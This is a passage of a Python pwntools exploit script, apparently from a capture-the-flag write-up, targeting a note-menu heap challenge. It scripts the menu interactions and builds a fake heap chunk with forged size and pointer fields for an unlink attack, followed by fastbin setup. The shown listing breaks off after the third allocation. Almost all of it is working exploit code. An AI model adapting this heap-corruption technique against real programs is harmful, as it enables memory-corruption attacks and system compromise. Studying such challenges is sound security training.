# Script switches: DEBUG attaches a debugger to the target, VERBOSE raises
# the logging level to "debug".
DEBUG = 0
VERBOSE = 1

if DEBUG:
    # `p` (the connection to the target) and `gdb` are defined elsewhere in
    # the file; presumably they come from pwntools -- confirm.
    gdb.attach(p)

if VERBOSE:
    context(log_level="debug")
def new_note(length, content):
    """Select menu option 1 and create a note.

    Waits for each prompt of the service in turn and answers it: the menu
    choice, the requested content length (sent as decimal text), then the
    content itself.

    Args:
        length: content length to request; converted with ``str()``.
        content: data sent as the note body.
    """
    # `p` is the module-level connection object defined elsewhere in the file.
    dialogue = (
        ('option--->>', '1'),
        ('Input the length of the note content:(less than 128)', str(length)),
        ('Input the note content:', content),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
def show_note(idx):
    """Select menu option 2 and ask the service to display note ``idx``.

    Only sends the request; the reply is left unread on the connection for
    the caller to consume.

    Args:
        idx: id of the note; converted with ``str()`` before sending.
    """
    # `p` is the module-level connection object defined elsewhere in the file.
    dialogue = (
        ('option--->>', '2'),
        ('Input the id of the note:', str(idx)),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
def edit_note(idx, choice, content):
    """Select menu option 3 and edit an existing note.

    Args:
        idx: id of the note to edit; converted with ``str()``.
        choice: edit mode as offered by the service prompt
            (1 = overwrite, 2 = append); converted with ``str()``.
        content: the new data sent for the note.
    """
    # `p` is the module-level connection object defined elsewhere in the file.
    dialogue = (
        ('option--->>', '3'),
        ('Input the id of the note:', str(idx)),
        ('do you want to overwrite or append?[1.overwrite/2.append]', str(choice)),
        ('TheNewContents:', content),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
def delete_note(idx):
    """Select menu option 4 and delete note ``idx``.

    Args:
        idx: id of the note to delete; converted with ``str()`` before sending.
    """
    # `p` is the module-level connection object defined elsewhere in the file.
    dialogue = (
        ('option--->>', '4'),
        ('Input the id of the note:', str(idx)),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
def exp():
    """Run the opening stage of the write-up's proof of concept.

    Answers the name and address prompts, then creates three notes through
    ``new_note``. The first note carries a crafted 0x68-byte body built from
    ``ptr``, which is defined elsewhere in the file.

    NOTE(review): the listing on this page stops after the third note; the
    later stages of the script are not shown here.
    """
    # Registration prompts: the values are throwaway.
    for prompt in ('Input your name:', 'Input your address:'):
        p.recvuntil(prompt)
        p.sendline('1')

    # Body of the first note: 8 filler bytes, a 0x61 size field and two
    # pointer-sized fields derived from `ptr`, padded with 'b' to 0x60 bytes,
    # followed by a trailing 0x60 field.
    # NOTE(review): concatenating str literals with p64() output assumes
    # Python 2 string semantics -- TODO confirm.
    crafted = 'a' * 8 + p64(0x61) + p64(ptr - 0x18) + p64(ptr - 0x10)
    crafted = crafted.ljust(0x60, 'b') + p64(0x60)

    new_note(0x80, crafted)  # use for unlink
    # NOTE(review): a length of 0 is requested although the service prompt
    # only states an upper bound ("less than 128"); whether the service
    # enforces a lower bound is not visible from this script.
    new_note(0, 'd' * 16)  # fastbin
    new_note(0x80, 'a' * 8)